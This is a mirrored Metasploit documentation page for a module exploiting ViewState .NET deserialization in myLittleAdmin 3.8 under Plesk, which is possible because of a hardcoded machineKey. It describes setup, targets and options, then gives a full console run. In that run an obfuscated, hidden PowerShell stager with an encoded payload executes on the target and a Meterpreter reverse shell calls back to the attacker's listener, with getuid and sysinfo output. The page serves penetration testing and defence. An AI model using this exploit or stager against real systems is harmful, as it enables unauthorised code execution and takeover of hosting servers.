dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
metasploit-framework/documentation/modules/exploit/windows/http/plesk_mylittleadmin_viewsta...

9.3 KiB
Raw Permalink Blame History

Vulnerable Application

Description

This module exploits a ViewState .NET deserialization vulnerability in web-based MS SQL Server management tool myLittleAdmin, for version 3.8 and likely older versions, due to hardcoded <machineKey> parameters in the web.config file for ASP.NET.

Popular web hosting control panel Plesk offers myLittleAdmin as an optional component that is selected automatically during "full" installation. This exploit caters to the Plesk target, though it should work fine against a standalone myLittleAdmin setup.

Successful exploitation results in code execution as the user running myLittleAdmin, which is IUSRPLESK_sqladmin for Plesk and described as the "SQL Admin MSSQL anonymous account."

Tested on the latest Plesk Obsidian with optional myLittleAdmin 3.8.

Setup

Follow Plesk's official instructions, making sure to select the "Obsidian" release and the Full installation option. This will get you myLittleAdmin. Alternatively, you may select the myLittleAdmin component manually.

Verification Steps

Follow Setup and Scenarios.

Targets

0

This executes a Windows command.

1

This uses a Windows dropper to execute code.

2

This uses a PowerShell stager to execute code.

Options

RPORT

You may need to change RPORT to where myLittleAdmin is running. It is set to port 8401 by default for Plesk installations.

Scenarios

myLittleAdmin 3.8 on Plesk Obsidian on Windows Server 2016

msf5 > use exploit/windows/http/plesk_mylittleadmin_viewstate
msf5 exploit(windows/http/plesk_mylittleadmin_viewstate) > options

Module options (exploit/windows/http/plesk_mylittleadmin_viewstate):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      8401             yes       The myLittleAdmin port (default for Plesk!) (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       Base path
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   2   PowerShell Stager


msf5 exploit(windows/http/plesk_mylittleadmin_viewstate) > set rhosts 172.16.249.169
rhosts => 172.16.249.169
msf5 exploit(windows/http/plesk_mylittleadmin_viewstate) > set lhost 172.16.249.1
lhost => 172.16.249.1
msf5 exploit(windows/http/plesk_mylittleadmin_viewstate) > run

[*] Started reverse TCP handler on 172.16.249.1:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] myLittleAdmin is running at https://172.16.249.169:8401/
[+] The target is vulnerable. We can sign our own ViewState.
[*] Executing PowerShell Stager for windows/x64/meterpreter/reverse_tcp
[*] Powershell command length: 2498
[*] Executing command: powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b=$env:windir+'\sysnative\WindowsPowerShell\v1.0\powershell.exe'}else{$b='powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIAFwAx14CA7VWbW+bSBD+nEj5D6iyZFAcG6dOm0aqdIAhxrUTE/zuWicMa9h4YQkssUmv//1mbUhTNb1rTzqExO7svD4zs8M6i1yGaSTkK0X4cnJ8NHASJxTEShbXhIp3d3sjHR0BueLNRsJHQVwocdymoYOj5dWVliUJithhX79GTElTFK4IRqkoCX8JkwAl6Ox2dY9cJnwRKn/WrwldOaRgyzXHDZBwpkQeP+tR1+Gu1O2YYCZWP3+uSouz5rKuP2QOScWqnacMhXWPkKokfJW4wWEeI7Hax25CU7pm9QmO3p7XR1HqrNENaHtEfcQC6qVVCYKAN0EsSyKBh8PlD6diFZaDhLqK5yUoTas1YcE1L5bLP8RFYfYuixgOUd2MGEpobKPkEbsorXecyCPoDq2XIGWzBEf+UpKA7ZFukFiJMkJqwu+oEW/QtgTtV4XEl0LANWCJVIMs/hhmn3oZQQfB6it+QuIleMrkA2xfT45PjtdlndDp5GWdwOposV8jcE0c0BTv2T4Kck3ogxWH0SSHbWWYZEhaPgMrVFAwpNvazxU0S27gfVhlQFmMKfaWIFEks0I/cerPS7KN1jhC7TxyQuyWVSe+BjBaE7QPsF6y3YBHYrU4QF4bEeQ7jGPG8/yDmB5i9iyrZph4KFFcSFIKXkH+pO+dOaRBrJpRH4WA0GEPhVdZQ62jkruo77y0zvfAVNWIk6Y1YZBBs7k1wUYOQV5NUKIUF0dKxuh+Wf3mbj8jDLtOykp1S+mAYmFNo1HKksyFlEHkQztGLnYIB6ImdLCH1NzGfmm1+ioMmkMIdABoeoQ0AIWHbzNeCAk4eEi6VLcRM8OYoBCY9k1vEMeHFi8KfV86jo+86vcOlnV8KFoORInAC/cguzahrCaMccLg5uCgQv38R+Mv7gxwQ0tQkQWx7IyFmjNe0JWHD08Tg9djgcoeg4RB/EZCQ9VJ0bvW4X4Q3zR03L4YtOmTAo9u3Flj1R6N52bf6xLbZPZMx71REJi4afqwz0e6P2By/Gk47HTtdkdJ2rtgrZipqXfU3GqqitvB78dddTQCOaz1rPudqXhq6E/9mbY1B8HUBENazzd9+Kpm4KryXPZV2dB6throWFZ82+pYrebcbFwSFT/Zpq10Js/2nu3orVZnuhsqN/2uEhi3ntE8N/byGy4/31z32vp+7/K9NUt1rIMd3ZhZ4wBNxrE60Y25NY5N/3TrW+Neo2UEKtBNvOvFdgOeZrP7GHlPfXL51Ad3rfG8i9Hc9FHuK5ai2LOI2KutpqiGm6jtC2VkjIC2GZrRzlrFfS+fdRofxn2MYqpYuqIYBPoxVJxtu9Gc0E/W+MIa6fIuH8m7rX7f2Oq4u90U39H1u3d+Y90aNMa2GXWcQAV/825rg7uncBY6Y3m2bow5fm09ajxFU+IMtCYlq0ZzhNvvVdXEqHvTd8mDCjGDjgtrRbVzN1iDT6Z/aflTGp07G9A78RXwDuKDPK+7JsioGcGb0emU6+pu5bC7k7mfYfcSfDsvfFBYZE4b4J/SadtadG2b03MPGWrj1P34hpcs1GwltLbBi1r82QDpO0kaOARqFEZDeSsYNDGK635AMZcQRf57sEFJhAjMV5jAZXMphFCXjxo+F2DKHWYPH4UjWL49f3UlCc+M0rcRVJKurubgI29a3lD1Hop8FtTk3VtZhpki71oyBPnrgWk0zsWDrhofSntonrWTvXaJN3Il1m69/xWz4vYI4OP9C2bfaP9w+ks4yrVDxD+Qvyf8Fqa/G/jEwQwYbbj7CDpM3lfjL8rjxW8Jzwnkfl08/K/yNmNnN/C3cnL8NwbBQmG9CgAA''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"
[+] Successfully executed command: powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b=$env:windir+'\sysnative\WindowsPowerShell\v1.0\powershell.exe'}else{$b='powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIAFwAx14CA7VWbW+bSBD+nEj5D6iyZFAcG6dOm0aqdIAhxrUTE/zuWicMa9h4YQkssUmv//1mbUhTNb1rTzqExO7svD4zs8M6i1yGaSTkK0X4cnJ8NHASJxTEShbXhIp3d3sjHR0BueLNRsJHQVwocdymoYOj5dWVliUJithhX79GTElTFK4IRqkoCX8JkwAl6Ox2dY9cJnwRKn/WrwldOaRgyzXHDZBwpkQeP+tR1+Gu1O2YYCZWP3+uSouz5rKuP2QOScWqnacMhXWPkKokfJW4wWEeI7Hax25CU7pm9QmO3p7XR1HqrNENaHtEfcQC6qVVCYKAN0EsSyKBh8PlD6diFZaDhLqK5yUoTas1YcE1L5bLP8RFYfYuixgOUd2MGEpobKPkEbsorXecyCPoDq2XIGWzBEf+UpKA7ZFukFiJMkJqwu+oEW/QtgTtV4XEl0LANWCJVIMs/hhmn3oZQQfB6it+QuIleMrkA2xfT45PjtdlndDp5GWdwOposV8jcE0c0BTv2T4Kck3ogxWH0SSHbWWYZEhaPgMrVFAwpNvazxU0S27gfVhlQFmMKfaWIFEks0I/cerPS7KN1jhC7TxyQuyWVSe+BjBaE7QPsF6y3YBHYrU4QF4bEeQ7jGPG8/yDmB5i9iyrZph4KFFcSFIKXkH+pO+dOaRBrJpRH4WA0GEPhVdZQ62jkruo77y0zvfAVNWIk6Y1YZBBs7k1wUYOQV5NUKIUF0dKxuh+Wf3mbj8jDLtOykp1S+mAYmFNo1HKksyFlEHkQztGLnYIB6ImdLCH1NzGfmm1+ioMmkMIdABoeoQ0AIWHbzNeCAk4eEi6VLcRM8OYoBCY9k1vEMeHFi8KfV86jo+86vcOlnV8KFoORInAC/cguzahrCaMccLg5uCgQv38R+Mv7gxwQ0tQkQWx7IyFmjNe0JWHD08Tg9djgcoeg4RB/EZCQ9VJ0bvW4X4Q3zR03L4YtOmTAo9u3Flj1R6N52bf6xLbZPZMx71REJi4afqwz0e6P2By/Gk47HTtdkdJ2rtgrZipqXfU3GqqitvB78dddTQCOaz1rPudqXhq6E/9mbY1B8HUBENazzd9+Kpm4KryXPZV2dB6throWFZ82+pYrebcbFwSFT/Zpq10Js/2nu3orVZnuhsqN/2uEhi3ntE8N/byGy4/31z32vp+7/K9NUt1rIMd3ZhZ4wBNxrE60Y25NY5N/3TrW+Neo2UEKtBNvOvFdgOeZrP7GHlPfXL51Ad3rfG8i9Hc9FHuK5ai2LOI2KutpqiGm6jtC2VkjIC2GZrRzlrFfS+fdRofxn2MYqpYuqIYBPoxVJxtu9Gc0E/W+MIa6fIuH8m7rX7f2Oq4u90U39H1u3d+Y90aNMa2GXWcQAV/825rg7uncBY6Y3m2bow5fm09ajxFU+IMtCYlq0ZzhNvvVdXEqHvTd8mDCjGDjgtrRbVzN1iDT6Z/aflTGp07G9A78RXwDuKDPK+7JsioGcGb0emU6+pu5bC7k7mfYfcSfDsvfFBYZE4b4J/SadtadG2b03MPGWrj1P34hpcs1GwltLbBi1r82QDpO0kaOARqFEZDeSsYNDGK635AMZcQRf57sEFJhAjMV5jAZXMphFCXjxo+F2DKHWYPH4UjWL49f3UlCc+M0rcRVJKurubgI29a3lD1Hop8FtTk3VtZhpki71oyBPnrgWk0zsWDrhofSntonrWTvXaJN3Il1m69/xWz4vYI4OP9C2bfaP9w+ks4yrVDxD+Qvyf8Fqa/G/jEwQwYbbj7CDpM3lfjL8rjxW8Jzwnkfl08/K/yNmNnN/C3cnL8NwbBQmG9CgAA''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"
[*] Sending stage (201283 bytes) to 172.16.249.169
[*] Meterpreter session 1 opened (172.16.249.1:4444 -> 172.16.249.169:57257) at 2020-05-21 17:27:42 -0500

meterpreter > getuid
Server username: WIN-NANLB47E6I4\IUSRPLESK_sqladmin
meterpreter > sysinfo
Computer        : WIN-NANLB47E6I4
OS              : Windows 2016+ (10.0 Build 14393).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 4
Meterpreter     : x64/windows
meterpreter >